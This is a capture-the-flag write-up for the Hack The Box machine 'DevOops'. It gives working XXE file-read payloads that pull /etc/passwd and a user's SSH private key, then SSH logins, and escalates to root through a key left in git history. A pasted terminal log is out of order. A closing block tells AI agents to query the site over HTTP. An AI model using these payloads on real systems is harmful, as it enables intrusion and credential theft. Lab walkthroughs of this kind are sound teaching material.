# DevOops

<figure><img src="/files/Irw09t7dd5kAlrHLb2Vp" alt=""><figcaption></figcaption></figure>

## Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.91 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.

{% code overflow="wrap" %}

```bash
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-21 18:47 CET
Nmap scan report for 10.10.10.91
Host is up (0.058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 14.02 seconds
```

{% endcode %}

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

> nmap -sC -sV -p22,5000 10.10.10.91 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.

{% code overflow="wrap" %}

```bash
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-21 18:49 CET
Nmap scan report for 10.10.10.91
Host is up (0.045s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4290e335318d8b86172afb3890dac495 (RSA)
|   256 b7b6dcc44c879b752a008983edb28031 (ECDSA)
|_  256 d52f1953b28e3a4bb3dd3c1fc0370d00 (ED25519)
5000/tcp open  http    Gunicorn 19.7.1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: gunicorn/19.7.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds
```

{% endcode %}

Website on port *5000* shows an `Under construction!` page.

<figure><img src="/files/W1vUcvFmzE9lI8EQ8GRo" alt=""><figcaption></figcaption></figure>

Let's try to see if there are any subdirectories or hidden files.

> gobuster dir -u <http://10.10.10.91:5000/> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 --no-error -x txt,php

* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of current **threads**, in this case 200 threads.

```
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.91:5000/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
2022/11/21 18:53:24 Starting gobuster in directory enumeration mode
===============================================================
/upload               (Status: 200) [Size: 347]
/feed                 (Status: 200) [Size: 546263]
/newpost              (Status: 405) [Size: 178]
===============================================================
2022/11/21 18:59:29 Finished
===============================================================
```

## Exploitation

The `/upload` directory allow us to upload XML files with the `Author`, `Subject` and `Content` attributes.

<figure><img src="/files/VfSDx0KVV2wivxx1NZEv" alt=""><figcaption></figcaption></figure>

Let's try to upload the `test.xml` file with the following XML code.

```xml
<item>
<Author>alfa8sa</Author>
<Subject>pwned</Subject>
<Content>Pwnedbyalfa8sa</Content>
</item>
```

<figure><img src="/files/cPOmBXjZIdohnloaxRNC" alt=""><figcaption></figcaption></figure>

The file was uploaded successfully. As the values of the attributes are shown in the page, we could try to exploit an XXE to get an LFI. The following code will create an XML Entity which will load the `/etc/passwd` file, then show the content in the `Author` attribute.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

<item>
<Author>&xxe;</Author>
<Subject>pwned</Subject>
<Content>Pwnedbyalfa8sa</Content>
</item>
```

<figure><img src="/files/6zAQ8N2bWherU7DAJ6gt" alt=""><figcaption></figcaption></figure>

There is one user called `roosa`. Let's try to get her `id_rsa` key.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/roosa/.ssh/id_rsa"> ]>

<item>
<Author>&xxe;</Author>
<Subject>pwned</Subject>
<Content>Pwnedbyalfa8sa</Content>
</item>
```

<figure><img src="/files/407otr7v0M6yp53vI8Mx" alt=""><figcaption></figcaption></figure>

Now, let's create an `id_rsa` file with that key, give it the right permissions, and log is as the `roosa` user. Then we could grab the user flag.

> nano id\_rsa
>
> chmod 600 id\_rsa
>
> ssh -i is\_rsa roosa\@10.10.10.91

```
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Fri Sep 23 09:46:30 2022
root@devoops:~# whoami
root
root@devoops:~# cat root.txt 
c5948adaf05042ec3d6c98f864440e4a
root@devoops:~# exit
logout
Connection to localhost closed.
roosa@devoops:~/work/blogfeed$ exit
logout
Connection to 10.10.10.91 closed.
❯ ssh -i id_rsa roosa@10.10.10.91
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Mon Nov 21 13:20:06 2022 from 10.10.14.14
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

roosa@devoops:~$ whoami
roosa
roosa@devoops:~$ cat user.txt 
488649de359589f7fe73a164c95f5d75
```

## Privilege Escalation

If we search for any git projects, we'll find one in `/home/roosa/work/blogfeed/`.

> find / -name "\*.git" 2>/dev/null

```
/srv/git/blogfeed.git
/home/roosa/work/blogfeed/.git
```

If we check the git log, we'll see one commit with the `reverted accidental commit with proper key` comment.

> cd /home/roosa/work/blogfeed/
>
> git log

```
...
commit 33e87c312c08735a02fa9c796021a4a3023129ad
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Mon Mar 19 09:33:06 2018 -0400

    reverted accidental commit with proper key
...
```

If we check the content of the commit, we'll see two private SSH keys.

> git show 33e87c312c08735a02fa9c796021a4a3023129ad

```
 -----BEGIN RSA PRIVATE KEY-----
-MIIEogIBAAKCAQEArDvzJ0k7T856dw2pnIrStl0GwoU/WFI+OPQcpOVj9DdSIEde
-8PDgpt/tBpY7a/xt3sP5rD7JEuvnpWRLteqKZ8hlCvt+4oP7DqWXoo/hfaUUyU5i
...
+T3Sd/6nWVzi1FO16KjhRGrqwb6BCDxeyxG508hHzikoWyMN0AA2st8a8YS6jiOog
+bU34EzQLp7oRU/TKO6Mx5ibQxkZPIHfgA1+Qsu27yIwlprQ64+oeEr0=
 -----END RSA PRIVATE KEY-----
```

Let's try to log in as root with the first one.

> nano /tmp/id\_rsa
>
> chmod 600 /tmp/id\_rsa

```
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEArDvzJ0k7T856dw2pnIrStl0GwoU/WFI+OPQcpOVj9DdSIEde
8PDgpt/tBpY7a/xt3sP5rD7JEuvnpWRLteqKZ8hlCvt+4oP7DqWXoo/hfaUUyU5i
...
oAvexd1JRMkbC7YOgrzZ9iOxHP+mg/LLENmHimcyKCqaY3XzqXqk9lOhA3ymOcLw
LS4O7JPRqVmgZzUUnDiAVuUHWuHGGXpWpz9EGau6dIbQaUUSOEE=
-----END RSA PRIVATE KEY-----
```

We'll see that the key is valid, and then all we have to do is reap the harvest and take the root flag.

> ssh -i /tmp/id\_rsa root\@localhost

```
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Mon Nov 21 14:18:45 2022 from 127.0.0.1
root@devoops:~# whoami
root
root@devoops:~# cat root.txt 
c5948adaf05042ec3d6c98f864440e4a
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/devoops.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.